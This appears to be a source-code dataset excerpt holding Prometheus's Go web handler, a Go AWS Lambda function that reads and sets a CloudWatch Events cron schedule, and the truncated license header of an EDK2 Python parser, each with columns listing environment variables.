func (h *Handler) ApplyConfig(conf *config.Config) error {
h.mtx.Lock()
defer h.mtx.Unlock()
h.config = conf
return nil
}
// Options for the web Handler.
type Options struct {
Context context.Context
TSDBRetentionDuration model.Duration
TSDBDir string
TSDBMaxBytes units.Base2Bytes
LocalStorage LocalStorage
Storage storage.Storage
QueryEngine *promql.Engine
LookbackDelta time.Duration
ScrapeManager *scrape.Manager
RuleManager *rules.Manager
Notifier *notifier.Manager
Version *PrometheusVersion
Flags map[string]string
ListenAddress string
CORSOrigin *regexp.Regexp
ReadTimeout time.Duration
MaxConnections int
ExternalURL *url.URL
RoutePrefix string
UseLocalAssets bool
UserAssetsPath string
ConsoleTemplatesPath string
ConsoleLibrariesPath string
EnableLifecycle bool
EnableAdminAPI bool
PageTitle string
RemoteReadSampleLimit int
RemoteReadConcurrencyLimit int
RemoteReadBytesInFrame int
Gatherer prometheus.Gatherer
Registerer prometheus.Registerer
}
// New initializes a new web Handler.
func New(logger log.Logger, o *Options) *Handler {
if logger == nil {
logger = log.NewNopLogger()
}
m := newMetrics(o.Registerer)
router := route.New().
WithInstrumentation(m.instrumentHandler).
WithInstrumentation(setPathWithPrefix(""))
cwd, err := os.Getwd()
if err != nil {
cwd = "<error retrieving current working directory>"
}
h := &Handler{
logger: logger,
gatherer: o.Gatherer,
metrics: m,
router: router,
quitCh: make(chan struct{}),
reloadCh: make(chan chan error),
options: o,
versionInfo: o.Version,
birth: time.Now().UTC(),
cwd: cwd,
flagsMap: o.Flags,
context: o.Context,
scrapeManager: o.ScrapeManager,
ruleManager: o.RuleManager,
queryEngine: o.QueryEngine,
lookbackDelta: o.LookbackDelta,
storage: o.Storage,
localStorage: o.LocalStorage,
notifier: o.Notifier,
now: model.Now,
ready: 0,
}
factoryTr := func(_ context.Context) api_v1.TargetRetriever { return h.scrapeManager }
factoryAr := func(_ context.Context) api_v1.AlertmanagerRetriever { return h.notifier }
FactoryRr := func(_ context.Context) api_v1.RulesRetriever { return h.ruleManager }
h.apiV1 = api_v1.NewAPI(h.queryEngine, h.storage, factoryTr, factoryAr,
func() config.Config {
h.mtx.RLock()
defer h.mtx.RUnlock()
return *h.config
},
o.Flags,
api_v1.GlobalURLOptions{
ListenAddress: o.ListenAddress,
Host: o.ExternalURL.Host,
Scheme: o.ExternalURL.Scheme,
},
h.testReady,
h.options.LocalStorage,
h.options.TSDBDir,
h.options.EnableAdminAPI,
logger,
FactoryRr,
h.options.RemoteReadSampleLimit,
h.options.RemoteReadConcurrencyLimit,
h.options.RemoteReadBytesInFrame,
h.options.CORSOrigin,
h.runtimeInfo,
h.versionInfo,
)
if o.RoutePrefix != "/" {
// If the prefix is missing for the root path, prepend it.
router.Get("/", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, o.RoutePrefix, http.StatusFound)
})
router = router.WithPrefix(o.RoutePrefix)
}
readyf := h.testReady
router.Get("/", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, path.Join(o.ExternalURL.Path, "/graph"), http.StatusFound)
})
router.Get("/alerts", readyf(h.alerts))
router.Get("/graph", readyf(h.graph))
router.Get("/status", readyf(h.status))
router.Get("/flags", readyf(h.flags))
router.Get("/config", readyf(h.serveConfig))
router.Get("/rules", readyf(h.rules))
router.Get("/targets", readyf(h.targets))
router.Get("/version", readyf(h.version))
router.Get("/service-discovery", readyf(h.serviceDiscovery))
router.Get("/metrics", promhttp.Handler().ServeHTTP)
router.Get("/federate", readyf(httputil.CompressionHandler{
Handler: http.HandlerFunc(h.federation),
}.ServeHTTP))
router.Get("/consoles/*filepath", readyf(h.consoles))
router.Get("/static/*filepath", func(w http.ResponseWriter, r *http.Request) {
r.URL.Path = path.Join("/static", route.Param(r.Context(), "filepath"))
fs := server.StaticFileServer(ui.Assets)
fs.ServeHTTP(w, r)
})
// Make sure that "<path-prefix>/new" is redirected to "<path-prefix>/new/" and
// not just the naked "/new/", which would be the default behavior of the router
// with the "RedirectTrailingSlash" option (https://godoc.org/github.com/julienschmidt/httprouter#Router.RedirectTrailingSlash),
// and which breaks users with a --web.route-prefix that deviates from the path derived
// from the external URL.
router.Get("/new", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, path.Join(o.ExternalURL.Path, "new")+"/", http.StatusFound)
})
router.Get("/new/*filepath", func(w http.ResponseWriter, r *http.Request) {
p := route.Param(r.Context(), "filepath")
// For paths that the React/Reach router handles, we want to serve the
// index.html, but with replaced path prefix placeholder.
for _, rp := range reactRouterPaths {
if p != rp {
continue
}
f, err := ui.Assets.Open("/static/react/index.html")
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "Error opening React index.html: %v", err)
return
}
idx, err := ioutil.ReadAll(f)
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "Error reading React index.html: %v", err)
return
}
prefixedIdx := bytes.ReplaceAll(idx, []byte("PATH_PREFIX_PLACEHOLDER"), []byte(o.ExternalURL.Path))
prefixedIdx = bytes.ReplaceAll(prefixedIdx, []byte("CONSOLES_LINK_PLACEHOLDER"), []byte(h.consolesPath()))
w.Write(prefixedIdx)
return
}
// For all other paths, serve auxiliary assets.
r.URL.Path = path.Join("/static/react/", p)
fs := server.StaticFileServer(ui.Assets)
fs.ServeHTTP(w, r)
})
if o.UserAssetsPath != "" {
router.Get("/user/*filepath", route.FileServe(o.UserAssetsPath))
}
if o.EnableLifecycle {
router.Post("/-/quit", h.quit)
router.Put("/-/quit", h.quit)
router.Post("/-/reload", h.reload)
router.Put("/-/reload", h.reload)
} else {
forbiddenAPINotEnabled := func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusForbidden)
w.Write([]byte("Lifecycle API is not enabled."))
}
router.Post("/-/quit", forbiddenAPINotEnabled)
router.Put("/-/quit", forbiddenAPINotEnabled)
router.Post("/-/reload", forbiddenAPINotEnabled)
router.Put("/-/reload", forbiddenAPINotEnabled)
}
router.Get("/-/quit", func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusMethodNotAllowed)
w.Write([]byte("Only POST or PUT requests allowed"))
})
router.Get("/-/reload", func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusMethodNotAllowed)
w.Write([]byte("Only POST or PUT requests allowed"))
})
router.Get("/debug/*subpath", serveDebug)
router.Post("/debug/*subpath", serveDebug)
router.Get("/-/healthy", func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
fmt.Fprintf(w, "Prometheus is Healthy.\n")
})
router.Get("/-/ready", readyf(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
fmt.Fprintf(w, "Prometheus is Ready.\n")
}))
return h
}
func serveDebug(w http.ResponseWriter, req *http.Request) {
ctx := req.Context()
subpath := route.Param(ctx, "subpath")
if subpath == "/pprof" {
http.Redirect(w, req, req.URL.Path+"/", http.StatusMovedPermanently)
return
}
if !strings.HasPrefix(subpath, "/pprof/") {
http.NotFound(w, req)
return
}
subpath = strings.TrimPrefix(subpath, "/pprof/")
switch subpath {
case "cmdline":
pprof.Cmdline(w, req)
case "profile":
pprof.Profile(w, req)
case "symbol":
pprof.Symbol(w, req)
case "trace":
pprof.Trace(w, req)
default:
req.URL.Path = "/debug/pprof/" + subpath
pprof.Index(w, req)
}
}
// Ready sets Handler to be ready.
func (h *Handler) Ready() {
atomic.StoreUint32(&h.ready, 1)
}
// Verifies whether the server is ready or not.
func (h *Handler) isReady() bool {
ready := atomic.LoadUint32(&h.ready)
return ready > 0
}
// Checks if server is ready, calls f if it is, returns 503 if it is not.
func (h *Handler) testReady(f http.HandlerFunc) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
if h.isReady() {
f(w, r)
} else {
w.WriteHeader(http.StatusServiceUnavailable)
fmt.Fprintf(w, "Service Unavailable")
}
}
}
// Checks if server is ready, calls f if it is, returns 503 if it is not.
func (h *Handler) testReadyHandler(f http.Handler) http.HandlerFunc {
return h.testReady(f.ServeHTTP)
}
// Quit returns the receive-only quit channel.
func (h *Handler) Quit() <-chan struct{} {
return h.quitCh
}
// Reload returns the receive-only channel that signals configuration reload requests.
func (h *Handler) Reload() <-chan chan error {
return h.reloadCh
}
// Run serves the HTTP endpoints.
func (h *Handler) Run(ctx context.Context) error {
level.Info(h.logger).Log("msg", "Start listening for connections", "address", h.options.ListenAddress)
listener, err := net.Listen("tcp", h.options.ListenAddress)
if err != nil {
return err
}
listener = netutil.LimitListener(listener, h.options.MaxConnections)
// Monitor incoming connections with conntrack.
listener = conntrack.NewListener(listener,
conntrack.TrackWithName("http"),
conntrack.TrackWithTracing())
var (
m = cmux.New(listener)
// See https://github.com/grpc/grpc-go/issues/2636 for why we need to use MatchWithWriters().
grpcl = m.MatchWithWriters(cmux.HTTP2MatchHeaderFieldSendSettings("content-type", "application/grpc"))
httpl = m.Match(cmux.HTTP1Fast())
grpcSrv = grpc.NewServer()
)
av2 := api_v2.New(
h.options.LocalStorage,
h.options.TSDBDir,
h.options.EnableAdminAPI,
)
av2.RegisterGRPC(grpcSrv)
hh, err := av2.HTTPHandler(ctx, h.options.ListenAddress)
if err != nil {
return err
}
hhFunc := h.testReadyHandler(hh)
operationName := nethttp.OperationNameFunc(func(r *http.Request) string {
return fmt.Sprintf("%s %s", r.Method, r.URL.Path)
})
mux := http.NewServeMux()
mux.Handle("/", h.router)
apiPath := "/api"
if h.options.RoutePrefix != "/" {
apiPath = h.options.RoutePrefix + apiPath
level.Info(h.logger).Log("msg", "Router prefix", "prefix", h.options.RoutePrefix)
}
av1 := route.New().
WithInstrumentation(h.metrics.instrumentHandlerWithPrefix("/api/v1")).
WithInstrumentation(setPathWithPrefix(apiPath + "/v1"))
h.apiV1.Register(av1)
mux.Handle(apiPath+"/v1/", http.StripPrefix(apiPath+"/v1", av1))
mux.Handle(apiPath+"/", http.StripPrefix(apiPath,
http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
httputil.SetCORS(w, h.options.CORSOrigin, r)
hhFunc(w, r)
}),
))
errlog := stdlog.New(log.NewStdlibAdapter(level.Error(h.logger)), "", 0)
httpSrv := &http.Server{
Handler: withStackTracer(nethttp.Middleware(opentracing.GlobalTracer(), mux, operationName), h.logger),
ErrorLog: errlog,
ReadTimeout: h.options.ReadTimeout,
}
errCh := make(chan error)
go func() {
errCh <- httpSrv.Serve(httpl)
}()
go func() {
errCh <- grpcSrv.Serve(grpcl)
}()
go func() {
errCh <- m.Serve()
}()
select {
case e := <-errCh:
return e
case <-ctx.Done():
httpSrv.Shutdown(ctx)
grpcSrv.GracefulStop()
return nil
}
}
func (h *Handler) alerts(w http.ResponseWriter, r *http.Request) {
var groups []*rules.Group
for _, group := range h.ruleManager.RuleGroups() {
if group.HasAlertingRules() {
groups = append(groups, group)
}
}
alertStatus := AlertStatus{
Groups: groups,
AlertStateToRowClass: map[rules.AlertState]string{
rules.StateInactive: "success",
rules.StatePending: "warning",
rules.StateFiring: "danger",
},
Counts: alertCounts(groups),
}
h.executeTemplate(w, "alerts.html", alertStatus)
}
func alertCounts(groups []*rules.Group) AlertByStateCount {
result := AlertByStateCount{}
for _, group := range groups {
for _, alert := range group.AlertingRules() {
switch alert.State() {
case rules.StateInactive:
result.Inactive++
case rules.StatePending:
result.Pending++
case rules.StateFiring:
result.Firing++
}
}
}
return result
}
func (h *Handler) consoles(w http.ResponseWriter, r *http.Request) {
ctx := r.Context()
name := route.Param(ctx, "filepath")
file, err := http.Dir(h.options.ConsoleTemplatesPath).Open(name)
if err != nil {
http.Error(w, err.Error(), http.StatusNotFound)
return
}
defer file.Close()
text, err := ioutil.ReadAll(file)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
ctx = httputil.ContextFromRequest(ctx, r)
// Provide URL parameters as a map for easy use. Advanced users may have need for
// parameters beyond the first, so provide RawParams.
rawParams, err := url.ParseQuery(r.URL.RawQuery)
if err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
return
}
params := map[string]string{}
for k, v := range rawParams {
params[k] = v[0]
}
externalLabels := map[string]string{}
h.mtx.RLock()
els := h.config.GlobalConfig.ExternalLabels
h.mtx.RUnlock()
for _, el := range els {
externalLabels[el.Name] = el.Value
}
// Inject some convenience variables that are easier to remember for users
// who are not used to Go's templating system.
defs := []string{
"{{$rawParams := .RawParams }}",
"{{$params := .Params}}",
"{{$path := .Path}}",
"{{$externalLabels := .ExternalLabels}}",
}
data := struct {
RawParams url.Values
Params map[string]string
Path string
ExternalLabels map[string]string
}{
RawParams: rawParams,
Params: params,
Path: strings.TrimLeft(name, "/"),
ExternalLabels: externalLabels,
}
tmpl := template.NewTemplateExpander(
ctx,
strings.Join(append(defs, string(text)), ""),
"__console_"+name,
data,
h.now(),
template.QueryFunc(rules.EngineQueryFunc(h.queryEngine, h.storage)),
h.options.ExternalURL,
)
filenames, err := filepath.Glob(h.options.ConsoleLibrariesPath + "/*.lib")
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
result, err := tmpl.ExpandHTML(filenames)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
io.WriteString(w, result)
}
func (h *Handler) graph(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "graph.html", nil)
}
func (h *Handler) status(w http.ResponseWriter, r *http.Request) {
status := struct {
Birth time.Time
CWD string
Version *PrometheusVersion
Alertmanagers []*url.URL
GoroutineCount int
GOMAXPROCS int
GOGC string
GODEBUG string
CorruptionCount int64
ChunkCount int64
TimeSeriesCount int64
LastConfigTime time.Time
ReloadConfigSuccess bool
StorageRetention string
NumSeries uint64
MaxTime int64
MinTime int64
Stats *index.PostingsStats
Duration string
}{
Birth: h.birth,
CWD: h.cwd,
Version: h.versionInfo,
Alertmanagers: h.notifier.Alertmanagers(),
GoroutineCount: runtime.NumGoroutine(),
GOMAXPROCS: runtime.GOMAXPROCS(0),
GOGC: os.Getenv("GOGC"),
GODEBUG: os.Getenv("GODEBUG"),
}
if h.options.TSDBRetentionDuration != 0 {
status.StorageRetention = h.options.TSDBRetentionDuration.String()
}
if h.options.TSDBMaxBytes != 0 {
if status.StorageRetention != "" {
status.StorageRetention = status.StorageRetention + " or "
}
status.StorageRetention = status.StorageRetention + h.options.TSDBMaxBytes.String()
}
metrics, err := h.gatherer.Gather()
if err != nil {
http.Error(w, fmt.Sprintf("error gathering runtime status: %s", err), http.StatusInternalServerError)
return
}
for _, mF := range metrics {
switch *mF.Name {
case "prometheus_tsdb_head_chunks":
status.ChunkCount = int64(toFloat64(mF))
case "prometheus_tsdb_head_series":
status.TimeSeriesCount = int64(toFloat64(mF))
case "prometheus_tsdb_wal_corruptions_total":
status.CorruptionCount = int64(toFloat64(mF))
case "prometheus_config_last_reload_successful":
status.ReloadConfigSuccess = toFloat64(mF) != 0
case "prometheus_config_last_reload_success_timestamp_seconds":
status.LastConfigTime = time.Unix(int64(toFloat64(mF)), 0).UTC()
}
}
startTime := time.Now().UnixNano()
s, err := h.localStorage.Stats("__name__")
if err != nil {
if errors.Cause(err) == tsdb.ErrNotReady {
http.Error(w, tsdb.ErrNotReady.Error(), http.StatusServiceUnavailable)
return
}
http.Error(w, fmt.Sprintf("error gathering local storage statistics: %s", err), http.StatusInternalServerError)
return
}
status.Duration = fmt.Sprintf("%.3f", float64(time.Now().UnixNano()-startTime)/float64(1e9))
status.Stats = s.IndexPostingStats
status.NumSeries = s.NumSeries
status.MaxTime = s.MaxTime
status.MinTime = s.MinTime
h.executeTemplate(w, "status.html", status)
}
func (h *Handler) runtimeInfo() (api_v1.RuntimeInfo, error) {
status := api_v1.RuntimeInfo{
StartTime: h.birth,
CWD: h.cwd,
GoroutineCount: runtime.NumGoroutine(),
GOMAXPROCS: runtime.GOMAXPROCS(0),
GOGC: os.Getenv("GOGC"),
GODEBUG: os.Getenv("GODEBUG"),
}
if h.options.TSDBRetentionDuration != 0 {
status.StorageRetention = h.options.TSDBRetentionDuration.String()
}
if h.options.TSDBMaxBytes != 0 {
if status.StorageRetention != "" {
status.StorageRetention = status.StorageRetention + " or "
}
status.StorageRetention = status.StorageRetention + h.options.TSDBMaxBytes.String()
}
metrics, err := h.gatherer.Gather()
if err != nil {
return status, errors.Errorf("error gathering runtime status: %s", err)
}
for _, mF := range metrics {
switch *mF.Name {
case "prometheus_tsdb_head_chunks":
status.ChunkCount = int64(toFloat64(mF))
case "prometheus_tsdb_head_series":
status.TimeSeriesCount = int64(toFloat64(mF))
case "prometheus_tsdb_wal_corruptions_total":
status.CorruptionCount = int64(toFloat64(mF))
case "prometheus_config_last_reload_successful":
status.ReloadConfigSuccess = toFloat64(mF) != 0
case "prometheus_config_last_reload_success_timestamp_seconds":
status.LastConfigTime = time.Unix(int64(toFloat64(mF)), 0).UTC()
}
}
return status, nil
}
func toFloat64(f *io_prometheus_client.MetricFamily) float64 {
m := *f.Metric[0]
if m.Gauge != nil {
return m.Gauge.GetValue()
}
if m.Counter != nil {
return m.Counter.GetValue()
}
if m.Untyped != nil {
return m.Untyped.GetValue()
}
return math.NaN()
}
func (h *Handler) flags(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "flags.html", h.flagsMap)
}
func (h *Handler) serveConfig(w http.ResponseWriter, r *http.Request) {
h.mtx.RLock()
defer h.mtx.RUnlock()
h.executeTemplate(w, "config.html", h.config.String())
}
func (h *Handler) rules(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "rules.html", h.ruleManager)
}
func (h *Handler) serviceDiscovery(w http.ResponseWriter, r *http.Request) {
var index []string
targets := h.scrapeManager.TargetsAll()
for job := range targets {
index = append(index, job)
}
sort.Strings(index)
scrapeConfigData := struct {
Index []string
Targets map[string][]*scrape.Target
Active []int
Dropped []int
Total []int
}{
Index: index,
Targets: make(map[string][]*scrape.Target),
Active: make([]int, len(index)),
Dropped: make([]int, len(index)),
Total: make([]int, len(index)),
}
for i, job := range scrapeConfigData.Index {
scrapeConfigData.Targets[job] = make([]*scrape.Target, 0, len(targets[job]))
scrapeConfigData.Total[i] = len(targets[job])
for _, target := range targets[job] {
// Do not display more than 100 dropped targets per job to avoid
// returning too much data to the clients.
if target.Labels().Len() == 0 {
scrapeConfigData.Dropped[i]++
if scrapeConfigData.Dropped[i] > 100 {
continue
}
} else {
scrapeConfigData.Active[i]++
}
scrapeConfigData.Targets[job] = append(scrapeConfigData.Targets[job], target)
}
}
h.executeTemplate(w, "service-discovery.html", scrapeConfigData)
}
func (h *Handler) targets(w http.ResponseWriter, r *http.Request) {
tps := h.scrapeManager.TargetsActive()
for _, targets := range tps {
sort.Slice(targets, func(i, j int) bool {
iJobLabel := targets[i].Labels().Get(model.JobLabel)
jJobLabel := targets[j].Labels().Get(model.JobLabel)
if iJobLabel == jJobLabel {
return targets[i].Labels().Get(model.InstanceLabel) < targets[j].Labels().Get(model.InstanceLabel)
}
return iJobLabel < jJobLabel
})
}
h.executeTemplate(w, "targets.html", struct {
TargetPools map[string][]*scrape.Target
}{
TargetPools: tps,
})
}
func (h *Handler) version(w http.ResponseWriter, r *http.Request) {
dec := json.NewEncoder(w)
if err := dec.Encode(h.versionInfo); err != nil {
http.Error(w, fmt.Sprintf("error encoding JSON: %s", err), http.StatusInternalServerError)
}
}
func (h *Handler) quit(w http.ResponseWriter, r *http.Request) {
fmt.Fprintf(w, "Requesting termination... Goodbye!")
close(h.quitCh)
}
func (h *Handler) reload(w http.ResponseWriter, r *http.Request) {
rc := make(chan error)
h.reloadCh <- rc
if err := <-rc; err != nil {
http.Error(w, fmt.Sprintf("failed to reload config: %s", err), http.StatusInternalServerError)
}
}
func (h *Handler) consolesPath() string {
if _, err := os.Stat(h.options.ConsoleTemplatesPath + "/index.html"); !os.IsNotExist(err) {
return h.options.ExternalURL.Path + "/consoles/index.html"
}
if h.options.UserAssetsPath != "" {
if _, err := os.Stat(h.options.UserAssetsPath + "/index.html"); !os.IsNotExist(err) {
return h.options.ExternalURL.Path + "/user/index.html"
}
}
return ""
}
func tmplFuncs(consolesPath string, opts *Options) template_text.FuncMap {
return template_text.FuncMap{
"since": func(t time.Time) time.Duration {
return time.Since(t) / time.Millisecond * time.Millisecond
},
"consolesPath": func() string { return consolesPath },
"pathPrefix": func() string { return opts.ExternalURL.Path },
"pageTitle": func() string { return opts.PageTitle },
"buildVersion": func() string { return opts.Version.Revision },
"globalURL": func(u *url.URL) *url.URL {
host, port, err := net.SplitHostPort(u.Host)
if err != nil {
return u
}
for _, lhr := range api_v1.LocalhostRepresentations {
if host == lhr {
_, ownPort, err := net.SplitHostPort(opts.ListenAddress)
if err != nil {
return u
}
if port == ownPort {
// Only in the case where the target is on localhost and its port is
// the same as the one we're listening on, we know for sure that
// we're monitoring our own process and that we need to change the
// scheme, hostname, and port to the externally reachable ones as
// well. We shouldn't need to touch the path at all, since if a
// path prefix is defined, the path under which we scrape ourselves
// should already contain the prefix.
u.Scheme = opts.ExternalURL.Scheme
u.Host = opts.ExternalURL.Host
} else {
// Otherwise, we only know that localhost is not reachable
// externally, so we replace only the hostname by the one in the
// external URL. It could be the wrong hostname for the service on
// this port, but it's still the best possible guess.
host, _, err := net.SplitHostPort(opts.ExternalURL.Host)
if err != nil {
return u
}
u.Host = host + ":" + port
}
break
}
}
return u
},
"numHealthy": func(pool []*scrape.Target) int {
alive := len(pool)
for _, p := range pool {
if p.Health() != scrape.HealthGood {
alive--
}
}
return alive
},
"targetHealthToClass": func(th scrape.TargetHealth) string {
switch th {
case scrape.HealthUnknown:
return "warning"
case scrape.HealthGood:
return "success"
default:
return "danger"
}
},
"ruleHealthToClass": func(rh rules.RuleHealth) string {
switch rh {
case rules.HealthUnknown:
return "warning"
case rules.HealthGood:
return "success"
default:
return "danger"
}
},
"alertStateToClass": func(as rules.AlertState) string {
switch as {
case rules.StateInactive:
return "success"
case rules.StatePending:
return "warning"
case rules.StateFiring:
return "danger"
default:
panic("unknown alert state")
}
},
}
}
func (h *Handler) getTemplate(name string) (string, error) {
var tmpl string
appendf := func(name string) error {
f, err := ui.Assets.Open(path.Join("/templates", name))
if err != nil {
return err
}
defer f.Close()
b, err := ioutil.ReadAll(f)
if err != nil {
return err
}
tmpl += string(b)
return nil
}
err := appendf("_base.html")
if err != nil {
return "", errors.Wrap(err, "error reading base template")
}
err = appendf(name)
if err != nil {
return "", errors.Wrapf(err, "error reading page template %s", name)
}
return tmpl, nil
}
func (h *Handler) executeTemplate(w http.ResponseWriter, name string, data interface{}) {
text, err := h.getTemplate(name)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
}
tmpl := template.NewTemplateExpander(
h.context,
text,
name,
data,
h.now(),
template.QueryFunc(rules.EngineQueryFunc(h.queryEngine, h.storage)),
h.options.ExternalURL,
)
tmpl.Funcs(tmplFuncs(h.consolesPath(), h.options))
result, err := tmpl.ExpandHTML(nil)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
io.WriteString(w, result)
}
// AlertStatus bundles alerting rules and the mapping of alert states to row classes.
type AlertStatus struct {
Groups []*rules.Group
AlertStateToRowClass map[rules.AlertState]string
Counts AlertByStateCount
}
type AlertByStateCount struct {
Inactive int32
Pending int32
Firing int32
}
func setPathWithPrefix(prefix string) func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
handler(w, r.WithContext(httputil.ContextWithPath(r.Context(), prefix+r.URL.Path)))
}
}
}
|
[
"\"GOGC\"",
"\"GODEBUG\"",
"\"GOGC\"",
"\"GODEBUG\""
] |
[] |
[
"GOGC",
"GODEBUG"
] |
[]
|
["GOGC", "GODEBUG"]
|
go
| 2 | 0 | |
api/main.go
|
package main
import (
"os"
"fmt"
"log"
"time"
"context"
"strconv"
"net/http"
"encoding/json"
"github.com/aws/aws-lambda-go/events"
"github.com/aws/aws-lambda-go/lambda"
"github.com/aws/aws-sdk-go-v2/aws"
"github.com/aws/aws-sdk-go-v2/config"
"github.com/aws/aws-sdk-go-v2/service/cloudwatchevents"
slambda "github.com/aws/aws-sdk-go-v2/service/lambda"
"github.com/aws/aws-sdk-go-v2/service/lambda/types"
)
type APIResponse struct {
Last string `json:"last"`
Message string `json:"message"`
Schedule string `json:"schedule"`
}
type Response events.APIGatewayProxyResponse
var cfg aws.Config
var lambdaClient *slambda.Client
var cloudwatcheventsClient *cloudwatchevents.Client
const layout string = "2006-01-02 15:04"
func HandleRequest(ctx context.Context, request events.APIGatewayProxyRequest) (Response, error) {
var jsonBytes []byte
var err error
if &request.RequestContext != nil && &request.RequestContext.Identity != nil && len (request.RequestContext.Identity.SourceIP) > 0 {
log.Println(request.RequestContext.Identity.SourceIP)
d := make(map[string]string)
json.Unmarshal([]byte(request.Body), &d)
if v, ok := d["action"]; ok {
switch v {
case "describe" :
schedule, e := describeRule(ctx)
if e != nil {
err = e
} else {
environment, e_ := getLambdaEnvironment(ctx)
if e_ != nil {
err = e_
} else {
jsonBytes, _ = json.Marshal(APIResponse{Message: "Success", Last: environment["LAST_EVENT"], Schedule: schedule})
}
}
case "put" :
if minute, ok := d["minute"]; ok {
if hour, o2 := d["hour"]; o2 {
if day, o3 := d["day"]; o3 {
if month, o4 := d["month"]; o4 {
if year, o5 := d["year"]; o5 {
e := putRule(ctx, minute, hour, day, month, year)
if e != nil {
err = e
} else {
jsonBytes, _ = json.Marshal(APIResponse{Message: "Success", Last: "", Schedule: ""})
}
}
}
}
}
}
}
}
if err != nil {
log.Print(err)
jsonBytes, _ = json.Marshal(APIResponse{Message: fmt.Sprint(err), Last: "", Schedule: ""})
return Response{
StatusCode: http.StatusInternalServerError,
Body: string(jsonBytes),
}, nil
}
} else {
err := updateLambdaEnvironment(ctx)
if err != nil {
log.Print(err)
jsonBytes, _ = json.Marshal(APIResponse{Message: fmt.Sprint(err), Last: "", Schedule: ""})
return Response{
StatusCode: http.StatusInternalServerError,
Body: string(jsonBytes),
}, nil
} else {
jsonBytes, _ = json.Marshal(APIResponse{Message: "Success", Last: "", Schedule: ""})
}
}
return Response {
StatusCode: http.StatusOK,
Body: string(jsonBytes),
}, nil
}
func describeRule(ctx context.Context)(string, error) {
if cloudwatcheventsClient == nil {
cloudwatcheventsClient = getCloudwatcheventsClient(ctx)
}
params := &cloudwatchevents.DescribeRuleInput{
Name: aws.String(os.Getenv("EVENT_NAME")),
}
res, err := cloudwatcheventsClient.DescribeRule(ctx, params)
if err != nil {
log.Print(err)
return "", err
}
return aws.ToString(res.ScheduleExpression), nil
}
func putRule(ctx context.Context, minute string, hour string, day string, month string, year string) error {
var m_ int
var h_ int
var d_ int
var o_ int
var y_ int
m_, _ = strconv.Atoi(minute)
h_, _ = strconv.Atoi(hour)
d_, _ = strconv.Atoi(day)
o_, _ = strconv.Atoi(month)
y_, _ = strconv.Atoi(year)
if m_ < 0 {
m_ = 0
}
sm := strconv.Itoa(m_)
if h_ < 0 {
h_ = 0
}
sh := strconv.Itoa(h_)
sd := "*"
if d_ > 0 {
sd = strconv.Itoa(d_)
}
so := "*"
if o_ > 0 {
so = strconv.Itoa(o_)
}
sy := "*"
if y_ >= 1970 {
sy = strconv.Itoa(y_)
}
if cloudwatcheventsClient == nil {
cloudwatcheventsClient = getCloudwatcheventsClient(ctx)
}
params := &cloudwatchevents.PutRuleInput{
Name: aws.String(os.Getenv("EVENT_NAME")),
ScheduleExpression: aws.String("cron(" + sm + " " + sh + " " + sd + " " + so + " ? " + sy + ")"),
}
res, err := cloudwatcheventsClient.PutRule(ctx, params)
if err != nil {
log.Print(err)
return err
}
log.Printf("%+v\n", res)
return nil
}
func getLambdaEnvironment(ctx context.Context)(map[string]string, error) {
if lambdaClient == nil {
lambdaClient = getLambdaClient(ctx)
}
res, err := lambdaClient.GetFunctionConfiguration(ctx, &slambda.GetFunctionConfigurationInput{
FunctionName: aws.String(os.Getenv("FUNCTION_NAME")),
})
if err != nil {
log.Println(err)
return map[string]string{}, err
}
return res.Environment.Variables, nil
}
func updateLambdaEnvironment(ctx context.Context) error {
t := time.Now()
env, err := getLambdaEnvironment(ctx)
if err != nil {
log.Println(err)
return err
}
env["LAST_EVENT"] = t.Format(layout)
_, err = lambdaClient.UpdateFunctionConfiguration(ctx, &slambda.UpdateFunctionConfigurationInput{
FunctionName: aws.String(os.Getenv("FUNCTION_NAME")),
Environment: &types.Environment{
Variables: env,
},
})
if err != nil {
log.Println(err)
return err
}
return nil
}
func getCloudwatcheventsClient(ctx context.Context) *cloudwatchevents.Client {
if cfg.Region != os.Getenv("REGION") {
cfg = getConfig(ctx)
}
return cloudwatchevents.NewFromConfig(cfg)
}
func getLambdaClient(ctx context.Context) *slambda.Client {
if cfg.Region != os.Getenv("REGION") {
cfg = getConfig(ctx)
}
return slambda.NewFromConfig(cfg)
}
func getConfig(ctx context.Context) aws.Config {
var err error
cfg, err := config.LoadDefaultConfig(ctx, config.WithRegion(os.Getenv("REGION")))
if err != nil {
log.Print(err)
}
return cfg
}
func main() {
lambda.Start(HandleRequest)
}
|
[
"\"EVENT_NAME\"",
"\"EVENT_NAME\"",
"\"FUNCTION_NAME\"",
"\"FUNCTION_NAME\"",
"\"REGION\"",
"\"REGION\"",
"\"REGION\""
] |
[] |
[
"FUNCTION_NAME",
"REGION",
"EVENT_NAME"
] |
[]
|
["FUNCTION_NAME", "REGION", "EVENT_NAME"]
|
go
| 3 | 0 | |
edk2/BaseTools/Source/Python/Common/FdfParserLite.py
|
## @file
# parse FDF file
#
# Copyright (c) 2007 - 2010, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
